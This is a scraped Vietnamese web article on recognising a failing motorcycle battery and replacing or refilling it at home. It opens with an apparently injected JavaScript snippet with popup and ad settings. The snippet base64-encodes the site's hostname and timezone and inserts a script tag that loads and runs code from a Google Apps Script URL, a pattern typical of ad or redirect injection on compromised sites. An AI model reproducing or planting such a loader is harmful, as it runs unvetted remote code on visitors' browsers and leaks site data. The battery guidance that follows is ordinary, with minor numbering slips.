var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách Thay Ắc Quy Xe Máy Tại Nhà Đơn Giản Nhanh Chóng

Hướng dẫn bạn nhận biết khi nào nên thay ắc quy xe máy và cách thay bình ắc quy xe máy tại nhà nhanh chóng đơn giản nhất!

Khi nào cần thay bình ắc quy xe máy

Những dấu hiệu sau cho thấy đã tới lúc bạn nên thay bình ắc quy:

  • Xi nhan kêu rất nhỏ, tiếng kêu bị đứt quãng, hoặc nghe tiếng xi nhan bị “nhão” (kéo dài, không gãy gọn), bị “lạc giọng”
  • Đề máy lên khó hoặc thậm chí không đề được, phải đạp máy mới chạy
  • Đèn không sáng như bình thường, xi nhan cũng không sáng như bình thường
  • Khởi động nguội khó: khởi động nguội là khởi động lần đầu tiên trong ngày, nếu ngày nào bạn cũng thấy đề khó thì có khả năng là ắc quy gần hết

Tuổi thọ của ắc quy thường kéo dàu khoảng 2 năm với ắc quy nước (dùng dung dịch axit), và tầm 3 năm với ắc quy khô (ắc quy kín khí, loại này giờ người ta xài nhiều).

Hồi xưa còn dùng ắc quy nước thì chúng ta còn có khái niệm “châm nước bình”, giờ thì do chúng ta đã chuyển sang dùng bình khô nhiều nên chỉ có thay luôn bình mà thôi.

Xem thêm: 13 loại khóa chống trộm xe máy tốt nhất

Nếu bình cạn thì bạn sẽ gặp những vấn đề gì?

Đèn xi nhan và đèn chính của xe sẽ hoạt động không như thiết kế, ánh sáng phát ra yếu hơn, và tiếng xi nhan cũng có thể bị nhỏ hơn bình thường.

Điều này khiến bạn khó quan sát đường hơn vào buổi tối, người khác không thấy rõ xi nhan của bạn khi bạn cần chuyển hướng, tóm lại là dễ bị tai nạn hơn.

Một cái khó chịu nữa là xe không đề được.

Ví dụ bạn sử dụng xe LEAD mà sau một thời gian đề khó mà quên đi thay bình thì tới 1 hôm không còn đề được nữa, mà xe LEAD đó lại không có đồ đạp , nên phải dắt bộ đi thay bình thì xe mới chạy lại.

Thay bình ắc quy xe máy hết bao nhiêu tiền

Giá bình ắc quy sẽ phụ thuộc vào nhiều yếu tố, cụ thể như sau:

  • Dung lượng: Bình ắc quy dùng cho xe máy thường có dung lượng từ 4Ah đến 10Ah. Để chắc chắn, bạn nên mua loại bình có dung lượng bằng với ắc quy đang sử dụng trên xe.
  • Điện áp: Các loại bình ắc quy cho xe máy thường có điện áp khoảng 12V.
  • Loại bình ắc quy:
    • Ắc quy khô: Đây là loại bình có kết cấu nhỏ gọn và được dùng khá phổ biến. Loại ắc quy này có ưu điểm là hoạt động khỏe, bền bỉ, tuổi thọ cao, không cần bảo dưỡng. Hiện có rất nhiều loại ắc quy khô khác nhau với mức giá giao động trong khoảng từ 200.000đ đến 400.000đ.
    • Ắc quy ướt: Loại bình này có các nút ở ngăn bình (để người dùng chêm thêm nước cất vào trong khi sử dụng). Nhược điểm của loại ắc quy này là tuổi thọ thấp, cần bảo dưỡng, bổ sung nước thường xuyên (khoảng 3 tháng/lần). Nhưng bù lại, giá của ắc quy ướt thường rẻ hơn so với ắc quy khô.

Những cách thay bình ắc quy xe máy tại nhà

Phục hồi/thêm axit vào bình ắc quy nước cũ

Trong một số trường hợp, chúng ta có thể phục hồi/thêm axit vào bình cũ mà không cần tốn tiền thay mới. Chỉ áp dụng cho bình ắc quy nước

Để phục hồi lại bình ắc quy, bạn có thể mang đến tiệm sửa chữa hoặc tự làm ở nhà theo các bước sau:

  • Bước 1: Kiểm tra trình trạng của bình bằng đồng hồ điện tử.
  • Bước 2: Bơm dung dịch phục hồi vào bình (nước cất, axit sunfuric,…).
  • Bước 3: Chờ trong khoảng vài phút để dung dịch chảy đều vào trong bình. Tiếp theo, xả điện ra ngoài bằng cách nối bình ắc quy với một bóng đèn nhỏ.
  • Bước 3: Sạc bình theo quy trình phục hồi ắc quy.
  • Bước 4: Đo lại dung lượng của bình. Nếu chưa đủ thì cần chêm thêm dung dịch.
  • Bước 5: Tiếp tục quá trình xả – sạc để phục hồi.

Các bạn xem video châm thêm nước cho bình để rõ hơn nhé!

Nếu bạn có đồ nghề thì có thể thử cách bên dưới này

Thay thế bình ắc quy cho xe máy nhanh chóng

Nếu bạn không muốn châm thêm nước cho bình ắc quy hoặc xe máy bạn sử dụng bình ắc quy khô thì hãy sử dụng cách thay thế bình ắc quy dưới đây nhé!

Bước 1: Tắt máy, tháo chìa khóa ra khỏi ổ khóa của xe

Bước 2: Xác định vị trí bình ắc quy của xe máy bạn nằm ở đâu va tiến hành dùng tua vít tháo các bộ phận che bình ắc quy ra.

Bước 3: Lấy bình ắc quy cũ ra khỏi xe, tháo dây từ cực âm (dây màu đen hoặc xanh) trước rồi đến cực dương (dây màu đỏ)

Đồng thời, hãy cẩn thận với điểm tiếp xúc của điện cực, vì đây là bộ phận phải chạm vào khi tháo bình để sạc hoặc thay thế.

Bước 4: Đấu dây dương (màu đỏ) vào bình ăc quy mới trước rồi đến dây âm (đen hoặc xanh). Sau đó đặt bình ắc quy về vị trí cũ và lắp lại là xong

Các bạn xem video thay bình ắc quy cho xe máy để hiểu rõ hơn nhé!

Video hướng dẫn thay ắc quy cho xe máy số

Video thay bình ắc quy cho xe Vision và các loại xe ga

Những lưu ý khi Tự Thay Ắc Quy xe máy

Hãy cẩn thận với các cực âm và dương của ắc quy

Ắc quy được chia làm 2 dạng ướt và khô, bao gồm cực âm và cực dương. Nếu nối ngược dòng điện sẽ chạy ngược chiều, có thể làm hỏng hệ thống điện hoặc kết cấu gây cháy xe.

Điện cực dương sẽ được các nhà sản xuất phân biệt bằng nắp che màu đỏ, đi kèm với dấu +. Trong mọi trường hợp anh em cần lưu ý màu đỏ là điện cực dương và màu xanh (hoặc đen) là điện cực âm cũng là một cách để phân biệt nhanh các điện cực.

​May mắn thay, hầu hết tất cả các xe máy hiện nay đều có cầu chì để phòng tránh những tai nạn như vậy. Trong hầu hết các trường hợp, nếu anh em có lỡ lắp sai điện cực, chỉ cần thay thế cầu chì.

Tháo từ cực âm trước, lắp từ cực dương trước

​Khi tháo thiết bị đầu tiếp xúc ra khỏi ắc quy, hãy chú ý đến thứ tự tháo. Khi tháo, hãy tháo đầu ra khỏi điện cực âm trước, nếu tháo ra khỏi điện cực dương trước có thể gây đoản mạch (trường hợp xấu nhất có thể nổ ắc quy)

Vì vậy hãy cẩn thận, khi lắp lại đầu nối thì lưu ý làm ngược lại là phải lắp đầu dương trước.

Cẩn thận với chất lỏng nạp vào Ắc quy nước

Đối với ắc quy nước, khi đổ đầy chất lỏng vào ắc quy. Hãy đảm bảo duy trì một lượng thích hợp. Khi lắp vào, hãy cẩn thận để không vượt quá mức chất lỏng tối đa và tối thiểu được đánh dấu trên thân bình.

Nếu mức sử dụng bình vượt quá giới hạn trên, chất lỏng bên trong sẽ bị rò rỉ trong quá trình lái xe, gây ăn mòn các chi tiết trên xe.

Không đặt ắc quy nằm nghiêng

​Bản thân chất lỏng bên trong ắc quy nước là axit sunfuric loãng không gây nổ hoặc dễ cháy. Tuy nhiên, khi sạc pin, khí hydro được tạo ra do phản ứng hóa học với kim loại. Phản ứng tương tự xảy ra khi kim loại tiếp xúc với mặt ngoài của ắc quy.

Nếu ắc quy được đặt nằm nghiêng, chất lỏng có thể bị rò rỉ từ đó, dẫn đến việc tạo khí hydro, dễ gây cháy và rỉ sét, vì vậy hãy đảm bảo không lật ngược ắc quy trong quá trình vận chuyển hoặc bảo quản.​

Nếu chất lỏng ắc quy nước vô tình bị rò rỉ

ac quy bi gi

​Axit Sunfuric loãng là một chất lỏng có tính axit ăn mòn, nếu tiếp xúc với da sẽ gây tổn thương cho da. Nếu bị dính vào da, hãy rửa sạch bằng nhiều nước, trung hòa bằng dung dịch natri bicacbonat và rửa sạch lại bằng nước.

​Nếu nó vô tình văng vào mắt, nó có thể gây mù trong những trường hợp nghiêm trọng nhất. Rửa ngay bằng nhiều nước và đến cơ sở y tế ngay lập tức. Khi rò rỉ xảy ra, vui lòng không tự xử lý mà hãy giao cho cửa hàng sửa chữa xe máy gần đó.